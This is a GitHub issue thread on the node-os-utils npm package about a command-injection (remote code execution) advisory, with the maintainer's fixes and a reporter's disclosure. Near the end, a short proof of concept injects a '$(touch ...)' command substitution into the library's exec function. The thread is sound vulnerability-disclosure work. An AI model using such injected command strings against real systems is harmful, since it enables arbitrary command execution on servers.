SunilWang / node-os-utils

OS Utils - An operating system utility library.
https://www.npmjs.com/package/node-os-utils
MIT License
125 stars 19 forks source link

package is signed as high severity vulnerability from npm #2

Closed gchiocchio closed 5 years ago

gchiocchio commented 5 years ago

package is signed as high severity vulnerability from npm

https://nodesecurity.io/advisories/784

Zorono commented 5 years ago

image i agree with you...

SunilWang commented 5 years ago

fix done!

https://www.npmjs.com/package/node-os-utils

npm install node-os-utils@1.1.0
rdimascio commented 4 years ago

Seems like this hasn't been fixed yet

https://www.npmjs.com/advisories/784

SunilWang commented 4 years ago

@rdimascio already modified once, I don't know where there will be risks. 已经修改过一次,我不知道哪里会有风险。

because call system commands? 是因为调用系统命令?

peterkingsbury commented 4 years ago

Could it work to contact the individual who reported the incident? He may have specifics that you can react to. The advisory site https://www.npmjs.com/advisories/784 links his homepage, where there is email for him to be contacted.

Because node-os-utils fails npm audit, and passing npm audit is part of our build pipeline, we can't use it any longer.

SunilWang commented 4 years ago

@peterkingsbury Email sent, waiting for reply,Thanks for feedback.

SunilWang commented 4 years ago

@peterkingsbury @rdimascio @Zorono @gchiocchio

https://www.npmjs.com/advisories/784

Overview Versions of node-os-utils prior to 1.1.0 are vulnerable to Remote Code Execution. Due to insufficient input validation an attacker could run arbitrary commands on the server thus rendering the package vulnerable to Remote Code Execution.

Remediation Upgrade to version 1.1.0 or later

Thank you all, Latest version 1.2.1

franktip commented 4 years ago

Hello, sorry for the delayed response. The following code snippet demonstrates the vulnerability in the version that I originally examined:

done = function done(){ console.log("Done!"); };

var DUMMY_FILE = './xyzzy';

var command = "$(touch " + DUMMY_FILE + ")";

function dummySource(val){ command += val; }

dummySource(' ');

var nodeosutils = require('node-os-utils') var exec = nodeosutils.exec; exec(command)();

done();

executing this code resulted in the creation of a file "xyzzy" due to the execution of an injected command.

franktip commented 4 years ago

I just tried running this code with the current version of node-os-utils, and the vulnerability appears to have been eliminated.